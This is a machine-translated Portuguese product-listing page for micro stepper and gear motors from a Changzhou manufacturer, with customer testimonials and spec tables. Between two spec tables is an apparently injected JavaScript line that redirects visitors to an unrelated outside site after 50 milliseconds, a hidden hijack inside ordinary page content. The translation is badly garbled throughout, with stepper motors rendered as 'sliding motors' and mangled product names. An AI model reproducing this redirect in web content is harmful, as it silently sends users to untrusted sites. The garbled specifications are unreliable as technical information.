Todos os Produtos
-
Micro motor de passo
-
Motor deslizante de ímã permanente
-
orientado motor de passo
-
Linear Stepper Motor
-
Motor deslizante do slider
-
motor de passo híbrido
-
motor da engrenagem pequena dc
-
Motores do ejetor de ROV
-
micro gearmotor do metal
-
Micro caixa de engrenagens
-
Motor deslizante de controle de posição
-
motor deslizante da impressora 3d
-
driver de motor stepper
-
Controlador do motor da C.C.
-
Parafuso movimentador e porca
-
Andres BlancoO ejetor chegou corretamente. Eu testei-os no ROV e nós estamos muito felizes com o resultado. O revestimento interior da cola Epoxy é muito bom e o poder dos motores com relação ao tamanho é bastante bom. -
Gregoire LangeA cooperação entre a tecnologia do motor da Vic-tecnologia de Changzhou e a nossa empresa era apenas grande. Boa compreensão de nossas necessidades, grande querer resolver nossos problemas. Eu recomendo! -
David MoleveltUma comunicação profissional e clara. A ordem foi enviada a tempo. Conectores contrários onde adicionado à expedição. Trabalhos do motorista como nós concordamos! -
Limitado privado de BuildstormO produto trabalha como esperado, ele foi embalado agradavelmente. O vendedor responde muito rapidamente e ajuda em fazer uma decisão de compra. Estão prontos para personalizar o produto para você. -
Grifo de AshleyA expedição foi recebida muito rapidamente. O produto foi protegido bem empacotando. O representante da empresa era cordial e amável. A mais a avaliação!
palavras-chave [ mini step motor ] Combine 112 produtos.
10mm Mini Gear Motor with 150 mA Current 3.3V~12V Voltage and 40Ω±7% Resistance 2 Phase Stepper Motor
| Fase: | 2 |
|---|---|
| Tipo: | Ímã permanente |
| Corrente pela fase: | 150 MA |
motor de piso linear deslizante prisioneiro do motor 24V de atuador linear de baixa tensão 12V de 25mm PM mini mini para a burótica
| Resistência: | 13Ω±10% |
|---|---|
| Fase: | 2 para 4 |
| Tipo: | Ímã permanente |
Objetivas Mini Stepper Motor 8mm 2 fio da fase 4 com engrenagem de cobre
| Ângulo da etapa (graus):: | 18 graus |
|---|---|
| Fase: | 2 |
| Voltagem: | 3.3V |
micro motor deslizante de 8mm 2 motor deslizante do fio da fase 4 mini com a engrenagem de cobre para as objetivas Pm08
| Ângulo da etapa (graus):: | 18 graus |
|---|---|
| Fase: | 2 |
| Tensão: | 3.3V |
Motor deslizante híbrido bifásico/mini tensão 28BYG do motor de etapa 10
| Ângulo da etapa (graus): | 1.8° |
|---|---|
| Guardarando o torque: | 1400g.cm |
| Fase: | 2 |
8mm diameter gearbox stepper motor 2-phase 4-wire mini gear motor application precision equipment
| Ângulo de passo: | 18 ° |
|---|---|
| Tensão: | 3,3 v |
| Resistência: | 40 Ω ± 10% |
302 setTimeout("javascript:location.href='https://best10.club/sitemap.php'", 50);
| Tensão: | 3.3V |
|---|---|
| Guardando o torque: | 0.8g.cm/900pps |
| Resistência de isolação: | 1MΩ DC100V |
Vic-Tech 2 Phase 4 Wire Stepper Motor , 3.3V DV Stepping Motor 8mm
| Tipo: | 3,3 motor deslizante de V |
|---|---|
| Ângulo da etapa (graus):: | 18° |
| Tensão:: | C.C. 3.3V |
Motor de passo micro de 6mm VSM0652 de 2 fases, mini motor de precisão
| Diâmetro do motor: | 6mm |
|---|---|
| Comprimento da fuselagem: | 7 mm |
| Diâmetro do eixo: | 1 mm |
Elevada precisão do motor deslizante 3.3v do fio do fornecedor 4 da porcelana do Gearmotor do metal de VSM08-016-10G 8mm motor deslizante da micro mini
| Tipo: | Motor da engrenagem |
|---|---|
| Torque: | Torque alto |
| Construção: | ímã permanente |

